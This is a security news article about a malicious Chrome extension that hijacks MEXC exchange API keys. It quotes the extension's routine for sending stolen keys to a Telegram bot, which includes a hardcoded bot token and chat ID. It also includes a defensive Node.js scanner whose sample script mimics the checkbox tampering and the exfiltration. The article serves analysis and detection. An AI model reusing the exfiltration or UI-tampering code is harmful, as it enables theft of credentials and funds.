A malicious Chrome extension named MEXC API Automator is targeting cryptocurrency traders on the MEXC exchange, stealthily stealing API login credentials and enabling unauthorized access to user accounts. The deceptive add-on poses as a legitimate tool for automating trading and API key creation, but in reality, it hijacks newly generated API keys, turning user browser sessions into pathways for full account takeovers.
Researchers at Socket.dev identified the malware, which was listed on the Chrome Web Store with claims of “easy API key creation with trading and withdrawal access” for MEXC. Upon installation, the extension activates when users access MEXC’s API management page, a common area for creating keys for trading bots. The attackers can then silently create powerful API keys, initiate trades, and authorize withdrawals from affected accounts globally.
Infection Mechanism, UI Deception, and Telegram Exfiltration
The MEXC API Automator operates as a Manifest V3 Chrome extension. Its core functionality is embedded in a single content script, `script.js`, which targets the MEXC API user interface. When a victim visits the MEXC API management page, the script injects itself, waits for the page to load, and then automatically selects all permission checkboxes within the API creation form. Crucially, this includes the withdrawal permission, a setting that users would typically need to enable explicitly.
To further deceive users, the extension employs clever UI manipulation. It alters the page’s styling to make the withdrawal option appear disabled, even though the server-side permissions remain active. The script removes the “checked” class from the withdrawal checkbox and uses injected CSS to hide the visual indicator. A MutationObserver is implemented to counteract any attempts by MEXC’s own code to restore the correct class, ensuring the deception persists.
The outcome of this manipulation is that victims believe they are only granting trading permissions. However, when they submit the form, it carries full withdrawal rights. Subsequently, when the MEXC exchange displays the success modal containing the newly generated Access Key and Secret Key, the extension swiftly scrapes both credentials directly from the web page’s DOM. These stolen keys are then transmitted in the background to a hardcoded Telegram bot and chat ID, as evidenced by a simple function within the extension’s code:
// Exfiltration routine as quoted from the extension's script.js; the bot token
// and chat ID are hardcoded in the extension itself.
function sendKeysToTelegram(apiKey, secretKey) {
  const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I';
  const chatId = '6526634583';
  // Posts both keys as a single message to the attacker-controlled chat via the Telegram Bot API.
  fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}\nSecret Key: ${secretKey}` })
  });
}
Because the extension operates within the browser’s sandbox and only accesses page content while communicating over standard HTTPS, its malicious activities are well-camouflaged within normal web traffic. By the time a user realizes that unauthorized trades are being made or funds are missing from their account, the attacker has likely already integrated the stolen API keys into scripts or automated tools capable of draining the account without ever needing the user’s primary login password.
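The injection, checkbox tampering, MutationObserver persistence and Telegram exfiltration described above all leave static fingerprints in an extension's files, and that is where a defender can catch this kind of add-on before it ever reaches a trading page. The scanner below is an added example written for this article, not code from Socket.dev and not code from the extension; it runs under Node.js over an unpacked extension's manifest and scripts and scores the indicators the report describes. The sample manifest and script, the host `example-exchange.test`, the regex rules and their weights are all constructed assumptions for the demo, and the token-shaped string in the sample is a placeholder rather than a real token.

```javascript
// Added example: static triage of an unpacked extension for the behaviours the
// article describes. Not the extension's code and not from the Socket.dev report.
// Rule patterns and weights are assumptions chosen for this demo.

const RULES = [
  { id: 'telegram-endpoint', weight: 4, re: /api\.telegram\.org\/bot/i,
    why: 'hardcoded Telegram Bot API endpoint (cheap exfiltration channel)' },
  { id: 'telegram-token', weight: 4, re: /\d{8,12}:[A-Za-z0-9_-]{30,}/,
    why: 'string shaped like a Telegram bot token' },
  { id: 'checkbox-autocheck', weight: 2,
    re: /input\[type=["']?checkbox["']?\][^;]*\.checked\s*=\s*true/s,
    why: 'bulk auto-selection of form checkboxes' },
  { id: 'withdraw-tamper', weight: 3,
    re: /withdraw[^;]*classList\.remove\(\s*["']checked["']\s*\)/is,
    why: 'withdrawal control made to look unchecked while the input stays enabled' },
  { id: 'mutation-observer', weight: 1, re: /new\s+MutationObserver\s*\(/,
    why: 'MutationObserver (keeps UI tampering in place against page code)' },
  { id: 'secret-key-read', weight: 2, re: /secret\s*key/i,
    why: 'references Secret Key text, i.e. reads key material from the DOM' },
];

// Scan one extension. `manifest` is the parsed manifest.json, `scripts` maps
// file names to source text, `watchedHosts` lists exchange hosts you care about.
function scanExtension({ manifest, scripts }, watchedHosts = []) {
  const findings = [];
  for (const cs of manifest.content_scripts || []) {
    for (const pattern of cs.matches || []) {
      if (watchedHosts.some(h => pattern.includes(h))) {
        findings.push({ id: 'content-script-on-watched-host', weight: 2,
          detail: `${(cs.js || []).join(', ')} runs on ${pattern}` });
      }
    }
  }
  for (const [file, src] of Object.entries(scripts)) {
    for (const rule of RULES) {
      if (rule.re.test(src)) { // rules carry no /g flag, so test() is stateless
        findings.push({ id: rule.id, weight: rule.weight, detail: `${file}: ${rule.why}` });
      }
    }
  }
  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  const verdict = score >= 8 ? 'high' : score >= 4 ? 'medium' : 'low';
  return { score, verdict, findings };
}

// Loader for a real unpacked extension directory (top-level .js files only).
function loadUnpacked(dir) {
  const fs = require('node:fs');
  const path = require('node:path');
  const manifest = JSON.parse(fs.readFileSync(path.join(dir, 'manifest.json'), 'utf8'));
  const scripts = {};
  for (const f of fs.readdirSync(dir)) {
    if (f.endsWith('.js')) scripts[f] = fs.readFileSync(path.join(dir, f), 'utf8');
  }
  return { manifest, scripts };
}

// Constructed sample mirroring the indicators in the article (placeholder token).
const SUSPICIOUS_SAMPLE = {
  manifest: {
    manifest_version: 3,
    name: 'Constructed Sample',
    content_scripts: [{ matches: ['*://*.example-exchange.test/*'], js: ['script.js'] }],
  },
  scripts: {
    'script.js': `
document.querySelectorAll('input[type="checkbox"]').forEach(cb => { cb.checked = true; });
document.querySelector('.withdraw-perm').classList.remove('checked');
new MutationObserver(() => document.querySelector('.withdraw-perm').classList.remove('checked'))
  .observe(document.body, { childList: true, subtree: true });
const secretKey = document.querySelector('.secret-key').textContent;
fetch('https://api.telegram.org/bot000000000:PLACEHOLDER_NOT_A_REAL_TOKEN_xxxxxxxxxx/sendMessage');
`,
  },
};

// Constructed benign sample: a content script that only restyles headings.
const BENIGN_SAMPLE = {
  manifest: { manifest_version: 3, name: 'Benign Sample',
    content_scripts: [{ matches: ['*://*.example-blog.test/*'], js: ['style.js'] }] },
  scripts: { 'style.js': `document.querySelectorAll('h1').forEach(h => { h.style.color = 'teal'; });` },
};

if (typeof require !== 'undefined' && require.main === module) {
  const dir = process.argv[2]; // optional path to an unpacked extension
  const target = dir ? loadUnpacked(dir) : SUSPICIOUS_SAMPLE;
  console.log(JSON.stringify(scanExtension(target, ['example-exchange.test']), null, 2));
}
```

Run it as `node scan.js /path/to/unpacked-extension` after unpacking the .crx, or with no argument to score the constructed sample. The weights are deliberately skewed so that a Telegram Bot API URL or a token-shaped string alone already lands in the medium band; the UI-tampering rules on their own are weak signals and only raise the verdict when they co-occur with an exfiltration channel and a content script scoped to an exchange host.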
Socket.dev researchers have linked the threat actor behind this operation to the handle “jorjortan142.” Their analysis found that the malicious code only executes within an active MEXC session where the user is already logged in, rendering traditional password theft tactics unnecessary. The extension’s success relies on leveraging the trust users place in browser add-ons and the perceived security of the Chrome Web Store. Instead of focusing on account passwords, the malware targets MEXC API keys, which are often long-lived, reused across different platforms, and monitored less stringently than interactive login sessions.
The ongoing investigation into such sophisticated attacks highlights the persistent threat posed by malicious browser extensions. Users are advised to exercise extreme caution when installing any browser add-on, particularly those granting access to financial platforms or sensitive data. Regularly reviewing browser extension permissions and uninstalling any unnecessary or suspicious add-ons are crucial steps in mitigating these risks. The next steps will likely involve MEXC implementing enhanced security measures to detect and block such malicious extensions, and potentially broader efforts by browser vendors to improve their vetting processes for extensions.